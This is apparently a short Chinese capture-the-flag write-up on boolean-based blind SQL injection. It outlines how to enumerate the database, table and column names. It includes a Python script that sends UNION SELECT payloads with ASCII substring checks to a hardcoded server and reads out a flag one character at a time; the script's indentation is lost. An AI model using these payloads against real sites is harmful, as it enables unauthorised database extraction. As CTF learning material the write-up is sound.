(其实我已经忘得差不多了orz)
思路
通过select是否返回
( 方法和时间盲注大同小异,一个是页面报错,一个是时间延时)
- 爆库名长度
- 爆库名
- 爆表名长度
- 爆表名
- 爆字段长度
- 爆字段
用python实现
import requests
#用这里的语句分别替换id中的内容即可爆库、表、字段(现在这段代码是最后一步爆flag了)
#select group_concat(SCHEMA_NAME) from information_schema.SCHEMATA
#select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA = 'crf'
#select 1,(select column_name from information_schema.columns where table_schema='ctf' and table_name='ctttf' limit 0,1),3 from ctttf where (select substring(column_name,"+str(i)+",1) from information_schema.columns where TABLE_SCHEMA = 'ctf' and table_name = 'ctttf' limit 0,1)='"+str(j)+"'--+"
url='http://120.78.142.81:49496/?id=-1\' union '
string=' '
for i in range(1,21):
for j in range(32,127):
id="select 1,(select flag from ctttf limit 0,1),3 from ctttf where (select ascii(substring(flag,"+str(i)+",1)) from information_schema.columns where TABLE_SCHEMA = 'ctf' and table_name = 'ctttf' limit 0,1)='"+str(j)+"'--+"
#print(id)
url_get=(url+id)
print(url_get)
r=requests.get(url_get)
if "You are in" in r.text:
string += chr(j)
print(string)
break
print(string)
没什么好说的?还是注意语法错误